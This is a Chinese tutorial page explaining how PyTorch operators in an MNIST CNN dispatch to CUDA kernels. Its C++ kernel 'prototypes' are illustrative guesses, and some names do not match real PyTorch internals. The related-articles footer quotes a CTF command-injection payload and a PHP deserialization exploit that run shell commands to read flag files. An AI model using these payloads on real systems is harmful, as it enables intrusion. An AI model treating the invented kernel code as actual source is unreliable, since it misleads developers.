pytorch 算子调用kernel示例(MINIST)

news2024/9/22 4:25:50

pytorch 算子调用kernel示例(MINIST)

当进行 MNIST 分类任务时,PyTorch 中的每一个算子会根据设备类型(CPU 或 CUDA)自动选择合适的内核(kernel)进行计算。本文以GPU为例,介绍算子调用kernel的过程。

1. 模型定义与前向传播

import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F

class SimpleCNN(nn.Module):
    def __init__(self):
        super(SimpleCNN, self).__init__()
        self.conv1 = nn.Conv2d(1, 32, kernel_size=3, stride=1, padding=1)  # 卷积层1
        self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1)  # 卷积层2
        self.fc1 = nn.Linear(64 * 7 * 7, 128)  # 全连接层1
        self.fc2 = nn.Linear(128, 10)  # 全连接层2
    
    def forward(self, x):
        x = F.relu(self.conv1(x))  # 激活函数 ReLU
        x = F.max_pool2d(x, 2)  # 最大池化
        x = F.relu(self.conv2(x))  # 激活函数 ReLU
        x = F.max_pool2d(x, 2)  # 最大池化
        x = x.view(-1, 64 * 7 * 7)  # 张量展平
        x = F.relu(self.fc1(x))  # 全连接层激活
        x = self.fc2(x)  # 输出层
        return F.log_softmax(x, dim=1)  # 计算 softmax 概率

2. 数据加载与模型放置到 GPU

from torchvision import datasets, transforms
from torch.utils.data import DataLoader

# 加载MNIST数据集
transform = transforms.Compose([transforms.ToTensor()])
train_dataset = datasets.MNIST('./data', train=True, download=True, transform=transform)
train_loader = DataLoader(train_dataset, batch_size=64, shuffle=True)

# 将模型和数据移动到 GPU
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = SimpleCNN().to(device)  # 模型加载到 GPU
optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)

# 训练过程
for epoch in range(1, 2):  # 运行1个 epoch
    model.train()
    for data, target in train_loader:
        data, target = data.to(device), target.to(device)  # 数据加载到 GPU
        optimizer.zero_grad()
        output = model(data)
        loss = F.nll_loss(output, target)
        loss.backward()
        optimizer.step()

3. 算子调用与 GPU 内核函数

当模型和数据都在 GPU 上时,PyTorch 的每一个算子会通过其调度机制(dispatch mechanism)调用相应的 CUDA 内核来加速计算。

(1) Conv2d (卷积层) 的 GPU 调用

在卷积操作中,PyTorch 会调用 Conv2d 算子。此时,设备被指定为 CUDA,调度系统会调用 GPU 专用的内核。

  • 算子调用:

    x = F.relu(self.conv1(x))
    
  • 内核调用

    • 对于 CUDA:调用 conv2d_cuda_kernel
  • CUDA 实现的原型代码conv2d_cuda_kernel 使用高度优化的 cuDNN 库来执行卷积操作,具体原型可能如下:

Tensor conv2d_cuda(
    const Tensor& input,
    const Tensor& weight,
    const Tensor& bias,
    IntArrayRef stride,
    IntArrayRef padding,
    IntArrayRef dilation,
    int64_t groups) {
    
    // 使用 cuDNN 卷积函数来加速计算
    return at::cudnn_convolution(input, weight, bias, padding, stride, dilation, groups);
}

at::cudnn_convolution 是一个封装好的接口,用于调用 cuDNN 库中的卷积操作。cuDNN 提供了一系列高度优化的卷积算法,能够根据输入数据的大小和 GPU 的架构,自动选择最优的计算方式。

(2) ReLU (激活函数) 的 GPU 调用

ReLU 激活函数会根据设备类型,调用 CUDA 内核来进行计算。

  • 算子调用

    
    x = F.relu(self.conv1(x))
    
  • 内核调用

    • 对于 CUDA:调用 relu_cuda_kernel
  • CUDA 实现的原型代码

    Tensor relu_cuda(const Tensor& self) {
      // 使用 CUDA 进行并行计算 ReLU
      return at::clamp_min_cuda(self, 0);
    }
    
(3) MaxPool2d (池化层) 的 GPU 调用
  • 算子调用

    x = F.max_pool2d(x, 2)
    
  • 内核调用

    • 对于 CUDA:调用 max_pool2d_cuda_kernel
  • CUDA 实现的原型代码

    Tensor max_pool2d_cuda(
        const Tensor& self,
        IntArrayRef kernel_size,
        IntArrayRef stride,
        IntArrayRef padding,
        bool ceil_mode) {
      // 使用 CUDA 并行池化运算
      ...
    }
    
(4) Linear (全连接层) 的 GPU 调用
  • 算子调用

    
    x = F.relu(self.fc1(x))
    
  • 内核调用

    • 对于 CUDA:调用 linear_cuda_kernel
  • CUDA 实现的原型代码

    Tensor linear_cuda(
        const Tensor& input,
        const Tensor& weight,
        const Tensor& bias) {
      // 使用 CUDA 进行矩阵乘法和偏置加法
      return at::addmm_cuda(bias, input, weight.t());
    }
    
(5) Softmax (输出层) 的 GPU 调用
  • 算子调用

    
    return F.log_softmax(x, dim=1)
    
  • 内核调用

    • 对于 CUDA:调用 log_softmax_cuda_kernel
  • CUDA 实现的原型代码

    Tensor log_softmax_cuda(const Tensor& self, int64_t dim, bool half_to_float) {
      // 使用 CUDA 并行计算 softmax
      ...
    }
    

Reference:

  1. https://github.com/pytorch/pytorch
  2. https://docs.nvidia.com/deeplearning/cudnn/api/index.html
  3. https://github.com/pytorch/pytorch

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2154084.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

《高等代数》线性相关和线性无关(应用)

说明:此文章用于本人复习巩固,如果也能帮到大家那就更加有意义了。 注:1)线性相关和线性无关的证明方法中较为常用的方法是利用秩和定义来证明。 2)此外,线性相关和线性无关的证明常常也会用到反证法。 3&…

简单水印通过python去除

简单水印通过python去除 先看效果,如果效果不是你需要的就可以不用浪费时间。 注意:这种主要还是对应的文字在水印上方的情况,同时最好不要有渐变水印否则可能最后输出的图片的水印还会有所残留,不过还是学习使用,相信…

DOS(Disk Operating System,磁盘操作系统)常用指令

目录 背景: 早期探索: DOS之父: 发展历程: 常用指令: 进入命令: 操作1.进入和回退: 操作2.增、删: 操作3.其它: 总结: 背景: 早期探索: DOS(Disk Operating System,磁盘操作系统)在…

【Web】PolarCTF2024秋季个人挑战赛wp

EZ_Host 一眼丁真命令注入 payload: ?host127.0.0.1;catf* 序列一下 exp: <?phpclass Polar{public $lt;public $b; } $pnew Polar(); $p->lt"system"; $p->b"tac /f*"; echo serialize($p);payload: xO:5:"Polar":2:{s:2:"…

VSCode C++ Tasks.json基本信息介绍

前言 上文介绍了VSCode在Windows环境下如果创建C项目和编译多个文件项目&#xff0c;但是只是粗略的说明了一下Tasks.json文件。今天对tasks.json进行进一步的了解。 内容 Tasks文件 {"version": "2.0.0","tasks": [{"type": &quo…

C#进阶-基于雪花算法的订单号设计与实现

在现代电商系统和分布式系统中&#xff0c;高效地生成全局唯一的订单号是一个关键需求。订单号不仅需要唯一性&#xff0c;还需要具备一定的趋势递增性&#xff0c;以满足数据库索引和排序的需求。本文将介绍如何在C#中使用雪花算法&#xff08;Snowflake&#xff09;设计和实现…

IntelliJ IDEA 2024创建Java项目

一、前言 本文将带领大家手把手创建纯Java项目&#xff0c;不涉及Maven。如有问题&#xff0c;欢迎大家在评论区指正说明&#xff01; 二、环境准备 名称版本jdk1.8idea2024 1.4操作系统win10 jdk的安装教程 idea的安装教程 三、创建项目 首先我们点击新建项目 然后我们…

基于SpringBoot+Vue+MySQL的国产动漫网站

系统展示 用户前台界面 管理员后台界面 系统背景 随着国内动漫产业的蓬勃发展和互联网技术的快速进步&#xff0c;动漫爱好者们对高质量、个性化的国产动漫内容需求日益增长。然而&#xff0c;市场上现有的动漫平台大多以国外动漫为主&#xff0c;对国产动漫的推广和展示存在不…

网页聊天——测试报告——Selenium自动化测试

一&#xff0c;项目概括 1.1 项目名称 网页聊天 1.2 测试时间 2024.9 1.3 编写目的 对编写的网页聊天项目进行软件测试活动&#xff0c;揭示潜在问题&#xff0c;总结测试经验 二&#xff0c;测试计划 2.1 测试环境与配置 服务器&#xff1a;云服务器 ubuntu_22 PC机&am…

十六、电压比较电路

电压比较电路 1、电压比较器的作用和工作过程 2、比较器的输入-输出特性曲线, 3、如何构成迟滞比较器。

Transformer模型-7- Decoder

概述 Decoder也是N6层堆叠的结构&#xff0c;每层被分3层: 两个注意力层和前馈网络层&#xff0c;同Encoder一样在主层后都加有Add&Norm&#xff0c;负责残差连接和归一化操作。 Encoder与Decoder有三大主要的不同&#xff1a; 第一层 Masked Multi-Head Attention: 采用…

SpringCloud Alibaba 工程搭建详细教程

使用 Spring Cloud Alibaba 的主要目的是解决单体应用的痛点&#xff0c;并利用微服务架构的优势来构建高扩展性、可靠的分布式系统。 1. 单体应用的痛点 单体应用虽然在小型项目中优势明显&#xff0c;但随着业务复杂性增加&#xff0c;逐渐暴露出许多问题&#xff1a; 代码…

Python | Leetcode Python题解之第420题强密码检验器

题目&#xff1a; 题解&#xff1a; class Solution:def strongPasswordChecker(self, password: str) -> int:n len(password)has_lower has_upper has_digit Falsefor ch in password:if ch.islower():has_lower Trueelif ch.isupper():has_upper Trueelif ch.isdi…

Datawhale X 南瓜书 task02学习笔记

算法原理引入 样本点通常应该在模型的2侧&#xff0c;原因&#xff1a;在实际中&#xff0c;因为某种不可控的因素&#xff0c;测出来的样本点肯定是有误差的。如果样本数据点都在模型上&#xff0c;则说明在建立模型时&#xff0c;把误差也考虑进去了&#xff0c;这就是我们说…

Linux使用常见问题指南

普通用户sudo权限问题 我在普通用户Sun下,编写了一个.cc文件,然后用sudo权限安装gcc/g去运行该文件,却提示我如下: 原因 当前的用户没有加入到sudo的配置文件里 #切换到root用户 su #编辑配置文件 vim /etc/sudoers #增加配置, 在打开的配置文件中&#xff0c;找到root ALL(A…

波分技术基础 -- FEC

信号在传输过程中&#xff0c;不可避免的会出现劣化、误码&#xff0c;FEC (Forward error correction) 技术确保通信系统在噪声和其他损伤的影响下&#xff0c;依然能够实现无错误传输。 应用场景&#xff1a;长途密集波分系统&#xff08;DWDM&#xff09;实现方式&#xff…

AI赋能篇:万物皆可播,AI视频直播新趋势,轻松打造24h不间断开播!

AI赋能篇&#xff1a;万物皆可播&#xff0c;AI视频直播新趋势&#xff0c;轻松打造24h不间断开播&#xff01; 在数字化浪潮的推动下&#xff0c;人工智能&#xff08;AI&#xff09;正以前所未有的速度渗透到我们生活的每一个角落&#xff0c;其中&#xff0c;AI视频直播作为…

基于vue框架的储蓄卡业务管理系统的设计与实现28g6t(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。

系统程序文件列表 项目功能&#xff1a;客户,银行账户,存款记录,取款记录,转账记录,经理,柜员,贷款产品,贷款申请,放款信息,还款信息,离职申请,通知公告,用户反馈,开户申请 开题报告内容 基于Vue框架的储蓄卡业务管理系统设计与实现开题报告 一、项目背景与意义 随着金融科…

智慧园区:解析集成运维的未来之路

随着科技的进步和社会的发展&#xff0c;智慧园区已经成为了城市建设的重要方向。作为一个集信息技术、通信技术、能源技术等多种技术于一体的综合性项目&#xff0c;智慧园区的建设具有极高的科技含量和产业复杂度。而在智慧园区的运维管理中&#xff0c;更是需要集成化的处理…

unity3d入门教程八-飞机大战

unity3d入门教程八-飞机大战 19.2竖屏设置19.3主控脚本19.4制作子弹19.5制作飞机19.6制作怪物19.7击中目标19.8随机生成怪物19.9预制体怪物随机更换头像19.10怪物相关优化19.11游戏背景19.12游戏最终优化一、 HP显示二、怪物预制体三、分值显示四、背景音乐 19.2竖屏设置 切换到…